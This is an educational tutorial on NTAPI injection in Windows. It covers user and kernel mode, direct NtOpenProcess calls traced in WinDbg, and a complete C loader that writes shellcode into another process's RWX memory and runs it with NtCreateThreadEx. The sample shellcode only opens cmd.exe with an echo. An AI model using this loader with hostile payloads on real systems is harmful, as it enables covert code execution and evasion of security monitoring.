NTAPI Injection
In this documentation, we will explore NTAPI Injection.
User Mode and Kernel Mode
Before we get into the technique, we need to cover some basics, starting with what User Mode and Kernel Mode are.

Windows uses two privilege levels (rings): user mode and kernel mode. This separation supports the security of the operating system, the organization of its work, and the efficient use of resources. The two modes play different roles and complement each other.
User Mode (Ring 3)
User mode is the area reserved for applications and processes running on the operating system. Processes running in this mode do not have direct access to system resources and hardware. Instead, they make calls to operating system components that run in kernel mode. These calls are usually made through WinAPI and, at a lower level, NTAPI, which is our main topic. Other features of user mode:
- It provides an isolated environment where user applications run.
- A crash usually affects only the application in question, not the whole system.
- It needs to switch to kernel mode for hardware access.
Kernel Mode (Ring 0)
Kernel mode is where the kernel of the operating system and the components that communicate directly with the hardware run. Code running in this mode, such as drivers, has full control over the system, meaning it has more privileges and power than anything in user mode. However, with this power comes great responsibility: errors in kernel mode can affect the entire system and cause it to crash. Other features of kernel mode:
- Direct access to hardware and system resources.
- It is a less isolated environment in terms of security measures and fault tolerance.
- It is the level where the system calls behind NTAPI functions are actually processed and executed.
What is Native API?
If you have followed my previous DLL Injection and Shellcode Execution write-ups, you may remember that in those techniques we usually used WinAPI functions to execute our code. However, WinAPI is a more user-friendly layer of the Windows operating system and is built on top of NTAPI (Native API).
NTAPI is a low-level programming interface that underlies both the user-mode and kernel-mode parts of Windows. WinAPI relies heavily on it behind the scenes: many WinAPI functions exported from libraries such as kernel32.dll are wrappers that end up calling the corresponding NTAPI function in ntdll.dll.
Let’s create a scenario to get a better picture. Let’s say we call OpenProcess from the user mode program. The operations shown in the diagram below will take place:

Looking at the diagram, the OpenProcess call made by the user-mode program is first routed to kernel32.dll and then to ntdll.dll, where it becomes NtOpenProcess. ntdll.dll is the last stop in user mode; from there, execution continues in the kernel.
I don’t want to go deep into the SSDT here because it is a fairly advanced topic. For now, you can think of it like this: the SSDT (System Service Descriptor Table) acts as a bridge that directs system calls from user mode to the correct routines in kernel mode. The table maps each requested Native API to the corresponding address in ntoskrnl.exe. If you want to know more about SSDT, you can check my documentation about SSDT.
After the SSDT lookup, the operation completes by jumping to the address of NtOpenProcess in ntoskrnl.exe.
It is also possible to see this live. Let’s create a project in Visual Studio where we just call OpenProcess and then analyze it in WinDbg to see what it turns into:

When we put a breakpoint on ntdll.dll, which is the last stop in user mode, and run the program, we can see that KERNELBASE!OpenProcess is called first (on current Windows versions kernel32.dll forwards OpenProcess to KernelBase.dll) and then ntdll!NtOpenProcess is called. After ntdll.dll, the flow continues in the kernel.
What is NTAPI Injection?
The NTAPI Injection technique involves interacting directly with the Windows Native API exported by ntdll.dll. This means that malware using this technique calls the lower-level functions in ntdll.dll instead of the higher-level Windows APIs. For example, the malware does not call OpenProcess, but calls the lower-level NtOpenProcess directly.
Let’s do some simple coding to understand the technique more closely and see how to call an NTAPI function in ntdll.dll directly from a user-mode program. Our example will be NtOpenProcess.
First, some preparation. Since the lower-level APIs we want to call are not declared in the standard user-mode headers, we need to declare them ourselves and then call them through their addresses.
We can use sites like NtDoc, which I often use, to create the relevant NTAPI:

We can find the prototype by searching for the NTAPI function we want to use in our project. Since our goal is to call NtOpenProcess, let’s search for it:

As we can see, NtOpenProcess takes four parameters:
NTSYSCALLAPI
NTSTATUS
NTAPI
NtOpenProcess(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ PCOBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PCLIENT_ID ClientId
);
If you remember, OpenProcess takes three parameters, while the lower-level NtOpenProcess takes four. Two of them, ObjectAttributes and ClientId, have no direct counterpart in OpenProcess.
Now let’s add this prototype to our project:

When we add the prototype to our project, the compiler reports errors for the last two parameter types. Since these are not declared in the standard user-mode headers, we need to define them ourselves, again using a site like NtDoc. We can find the definitions by searching for CLIENT_ID and OBJECT_ATTRIBUTES on the site:

After these two structures, define any other types that still produce errors by looking them up on the site in the same way.
Finally, we need NTSTATUS before we start coding. NTAPI functions return a value of type NTSTATUS, so we define it as well and use its value to check whether a call succeeded:
typedef _Return_type_success_(return >= 0) long NTSTATUS;
Let’s add this to our project. Now we can move on to coding:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    _Field_size_bytes_part_opt_(MaximumLength, Length) PWCH Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PCUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor; // PSECURITY_DESCRIPTOR;
    PVOID SecurityQualityOfService; // PSECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS(NTAPI* NtOpenProcess)(
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PCLIENT_ID ClientId
);
int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: program.exe <PID>\n");
        return -1;
    }
    DWORD PID = (DWORD)atoi(argv[1]);

    /* ntdll.dll is already loaded in the process, so we only need its handle. */
    HMODULE NTDLL = GetModuleHandleW(L"ntdll.dll");
    if (NTDLL == NULL) {
        printf("Failed to get the address of NTDLL!\n");
        return -1;
    }
    printf("NTDLL address: 0x%p\n", (void*)NTDLL);

    /* Resolve NtOpenProcess by name and cast it to our function pointer type. */
    NtOpenProcess NtOpenProcessAddress = (NtOpenProcess)GetProcAddress(NTDLL, "NtOpenProcess");
    if (NtOpenProcessAddress == NULL) {
        printf("Failed to get the address of NtOpenProcess!\n");
        return -1;
    }
    printf("NtOpenProcess address: 0x%p\n", (void*)NtOpenProcessAddress);

    HANDLE HandleProcess = NULL;
    OBJECT_ATTRIBUTES ObjAttr = { sizeof(ObjAttr), NULL };
    CLIENT_ID CID = { (HANDLE)(ULONG_PTR)PID, NULL };
    NTSTATUS Status = NtOpenProcessAddress(&HandleProcess, PROCESS_ALL_ACCESS, &ObjAttr, &CID);
    if (Status != 0) {
        printf("NtOpenProcess failed! Status: 0x%08lx\n", (unsigned long)Status);
        return -1;
    }
    printf("NtOpenProcess succeeded!\n");
    return 0;
}
Let’s take a detailed look:
HMODULE NTDLL = GetModuleHandleW(L"ntdll.dll");
if (NTDLL == NULL) {
    printf("Failed to get the address of NTDLL!\n");
    return -1;
}
printf("NTDLL address: 0x%p\n", (void*)NTDLL);
In main, we start by getting the address of ntdll.dll. With that address in hand, we can look up the address of NtOpenProcess inside the library.
NtOpenProcess NtOpenProcessAddress = (NtOpenProcess)GetProcAddress(NTDLL, "NtOpenProcess");
if (NtOpenProcessAddress == NULL) {
    printf("Failed to get the address of NtOpenProcess!\n");
    return -1;
}
printf("NtOpenProcess address: 0x%p\n", (void*)NtOpenProcessAddress);
After getting the address of ntdll, we get the address of NtOpenProcess from it with GetProcAddress and store it in a variable of the NtOpenProcess function pointer type we defined in the project.
HANDLE HandleProcess = NULL;
OBJECT_ATTRIBUTES ObjAttr = { sizeof(ObjAttr), NULL };
CLIENT_ID CID = { (HANDLE)(ULONG_PTR)PID, NULL };
NTSTATUS Status = NtOpenProcessAddress(&HandleProcess, PROCESS_ALL_ACCESS, &ObjAttr, &CID);
if (Status != 0) {
    printf("NtOpenProcess failed! Status: 0x%08lx\n", (unsigned long)Status);
    return -1;
}
printf("NtOpenProcess succeeded!\n");
Finally, we call NtOpenProcess. But before that we define the OBJECT_ATTRIBUTES and CLIENT_ID structures.
Note that OpenProcess takes the PID directly as a DWORD, whereas NtOpenProcess does not. Instead, the PID goes into UniqueProcess, the first member of CLIENT_ID, which has type HANDLE.
Pay attention to the if condition in this section. Unlike many WinAPI functions, which signal failure with a zero or NULL return value, NTAPI functions return an NTSTATUS, and the success code STATUS_SUCCESS is 0. So if the call returns anything other than 0, we print the status code. Strictly speaking, any non-negative NTSTATUS counts as success, which is what the NT_SUCCESS macro in the SDK tests, but for this example comparing against 0 is enough.
Instead of running the program directly and looking at the result, let’s analyze it in more detail and see what is happening in the background. Let’s open the .exe file we built in WinDbg:

After pressing the Debug button, let’s set a breakpoint (bp) on the main function and run the program:

Let’s activate View > Disassembly from the top of WinDbg and take a look at the disassembly of the main function:

In the main function, we can start with the address of ntdll that we got with GetModuleHandleW. Let’s add a bp right after GetModuleHandleW runs and see what value rax gets:

After GetModuleHandleW runs, we can verify that rax points to the start address of ntdll.dll.
The next step is getting the address of NtOpenProcess with GetProcAddress:

In the same way, let’s add a bp right after GetProcAddress runs and take a look at the value rax gets:

As we can see, the execution of GetProcAddress yields the address 00007ffc7c6dfbd0 and when we check the address we can see that it is NtOpenProcess in ntdll.
Now let’s finally turn our focus to the point where we call NtOpenProcess:

In this section we can see that the parameters for NtOpenProcess are prepared and then NtOpenProcess is called. Notice one thing, however: the parameters are prepared in reverse order. If you look at the symbol names, you will see that the CID structure is prepared first and placed in the r9 register, and the address of HandleProcess is placed in the rcx register last.
On 32-bit x86, Win32 APIs like OpenProcess use the stdcall calling convention. The Microsoft Learn documentation describes it as follows:
The __stdcall calling convention is used to call Win32 API functions. The callee cleans the stack, so the compiler makes vararg functions __cdecl. Functions that use this calling convention require a function prototype. The __stdcall modifier is Microsoft-specific.
Under stdcall, arguments are pushed onto the stack from right to left:

Let’s go back to our C code for a better understanding:
NTSTATUS Status = NtOpenProcessAddress(
    &HandleProcess,
    PROCESS_ALL_ACCESS,
    &ObjAttr,
    &CID
);
Although this is the order in which we write the arguments of NtOpenProcess in the project, the compiler is free to set them up in any order before the call. In our build it does so from right to left, the same order stdcall uses on x86, so the order of preparation looks like this:
/* Order of preparation only; this is not a valid call. */
NTSTATUS Status = NtOpenProcessAddress(
    &CID,
    &ObjAttr,
    PROCESS_ALL_ACCESS,
    &HandleProcess
);
You will also notice that registers such as r9 are used while preparing the parameters. These registers are not chosen at random. Our program is a 64-bit build, where the compiler accepts __stdcall but ignores it and applies the Windows x64 calling convention instead:
By default, the x64 calling convention passes the first four arguments to a function in registers. The registers used for these arguments depend on the position and type of the argument. Remaining arguments get pushed on the stack in right-to-left order. All arguments passed on the stack are 8-byte aligned.
The first four integer or pointer parameters of a function are passed in the rcx, rdx, r8 and r9 registers. If there are more than four parameters, the rest are passed on the stack. Applied to NtOpenProcess, the arguments are assigned as shown below:
NTSTATUS Status = NtOpenProcessAddress(
    &HandleProcess,     // rcx
    PROCESS_ALL_ACCESS, // rdx
    &ObjAttr,           // r8
    &CID                // r9
);
We can also verify this if we look at the Disassembly screen again:

Let’s add a bp in main at the call to NtOpenProcess and step over it with p to see what NtOpenProcess returns:

NtOpenProcess returned 0. As mentioned earlier, a return value of 0 (STATUS_SUCCESS) from a Native API that returns NTSTATUS means the call succeeded.
Let’s make a diagram of the operations we did in the project:

If you remember from the first diagram, the first stop was kernel32.dll. In our project we skip that layer and call NtOpenProcess in ntdll.dll directly from the program.
Injecting Shellcode with NTAPI
Now we know what the NTAPI Injection technique is about. We will follow the same steps as in our Shellcode Execution documentation, but this time using NTAPI functions.
First, let’s create a utils.h header in the project and paste the following code:
#pragma once
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#pragma region STRUCTURES
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
VOID* RootDirectory;
struct _UNICODE_STRING* ObjectName;
ULONG Attributes;
VOID* SecurityDescriptor;
VOID* SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _PS_ATTRIBUTE {
ULONGLONG Attribute;
SIZE_T Size;
union {
ULONG_PTR Value;
PVOID ValuePtr;
};
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef NTSTATUS(NTAPI* fn_NtOpenProcess) (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtAllocateVirtualMemory) (
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN ULONG ZeroBits,
IN OUT PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
typedef NTSTATUS(NTAPI* fn_NtWriteVirtualMemory) (
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T NumberOfBytesToWrite,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtCreateThreadEx) (
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument OPTIONAL,
IN ULONG CreateFlags,
IN SIZE_T ZeroBits,
IN SIZE_T StackSize,
IN SIZE_T MaximumStackSize,
IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL
);
typedef NTSTATUS(NTAPI* fn_NtWaitForSingleObject) (
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout
);
typedef NTSTATUS(NTAPI* fn_NtClose) (
IN HANDLE Handle
);
#pragma endregion
And let’s write main.c:
#include "utils.h"
/*
cmd.exe /K "echo NTAPI Injection with bekoo"
*/
char Shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x4b\x20\x22\x65"
"\x63\x68\x6f\x20\x4e\x54\x41\x50\x49\x20\x49\x6e\x6a\x65"
"\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x62\x65\x6b"
"\x6f\x6f\x22\x00";
size_t ShellcodeSize = sizeof(Shellcode);
int main(int argc, char* argv[]) {
if (argc < 2) {
printf("Usage: .\\injection.exe <PID>\n");
return -1;
}
DWORD PID = atoi(argv[1]);
HANDLE HandleProcess = NULL;
HANDLE HandleThread = NULL;
HMODULE ntDLL = NULL;
PVOID RemoteBuffer = NULL;
size_t bytesWritten = 0;
OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr), NULL };
CLIENT_ID CID = { (HANDLE)PID, NULL };
NTSTATUS Status = STATUS_SUCCESS;
/* Get handle to ntdll */
ntDLL = GetModuleHandleA("ntdll.dll");
if (ntDLL == NULL) {
printf("Failed to get handle for NTDLL! Error Code: 0x%lx\n", GetLastError());
return -1;
}
/* NtClose */
fn_NtClose ntClose = (fn_NtClose)GetProcAddress(ntDLL, "NtClose");
/* NtOpenProcess */
fn_NtOpenProcess ntOpenProcess = (fn_NtOpenProcess)GetProcAddress(ntDLL, "NtOpenProcess");
Status = ntOpenProcess(&HandleProcess, PROCESS_ALL_ACCESS, &objAttr, &CID);
if (Status != STATUS_SUCCESS) {
printf("Failed to open handle to Process! Error Code: 0x%lx", Status);
return -1;
}
/* NtAllocateVirtualMemory */
fn_NtAllocateVirtualMemory ntAllocateVirtualMemory = (fn_NtAllocateVirtualMemory)GetProcAddress(ntDLL, "NtAllocateVirtualMemory");
Status = ntAllocateVirtualMemory(HandleProcess, &RemoteBuffer, 0, &ShellcodeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
if (Status != STATUS_SUCCESS) {
printf("Failed to Allocate Memory in Process! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NtWriteVirtualMemory */
fn_NtWriteVirtualMemory ntWriteVirtualMemory =
(fn_NtWriteVirtualMemory)GetProcAddress(ntDLL, "NtWriteVirtualMemory");
Status = ntWriteVirtualMemory(HandleProcess, RemoteBuffer, Shellcode, sizeof(Shellcode), &bytesWritten);
if (Status != STATUS_SUCCESS || bytesWritten != sizeof(Shellcode)) {
printf("Failed to Write Memory in Process! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NtCreateThreadEx */
fn_NtCreateThreadEx ntCreateThreadEx =
(fn_NtCreateThreadEx)GetProcAddress(ntDLL, "NtCreateThreadEx");
Status = ntCreateThreadEx(&HandleThread, THREAD_ALL_ACCESS, &objAttr, HandleProcess, (RemoteBuffer), NULL, FALSE, 0, 0, 0, 0);
if (Status != STATUS_SUCCESS) {
printf("Failed to create Thread! Error Code: 0x%lx", Status);
ntClose(HandleProcess);
return -1;
}
/* NtWaitForSingleObject */
fn_NtWaitForSingleObject ntWaitForSingleObject =
(fn_NtWaitForSingleObject)GetProcAddress(ntDLL, "NtWaitForSingleObject");
Status = ntWaitForSingleObject(HandleThread, FALSE, NULL);
if (Status != STATUS_SUCCESS) {
printf("Failed to wait for Thread! Error Code: 0x%lx", Status);
ntClose(HandleThread);
ntClose(HandleProcess);
return -1;
}
ntClose(HandleThread);
ntClose(HandleProcess);
return 0;
}
Here’s the result:
Conclusion
In this documentation we took a close look at NTAPI. We started with the theory behind user mode and kernel mode, then called an NTAPI function directly from ntdll.dll, and finally executed shellcode using NTAPI functions.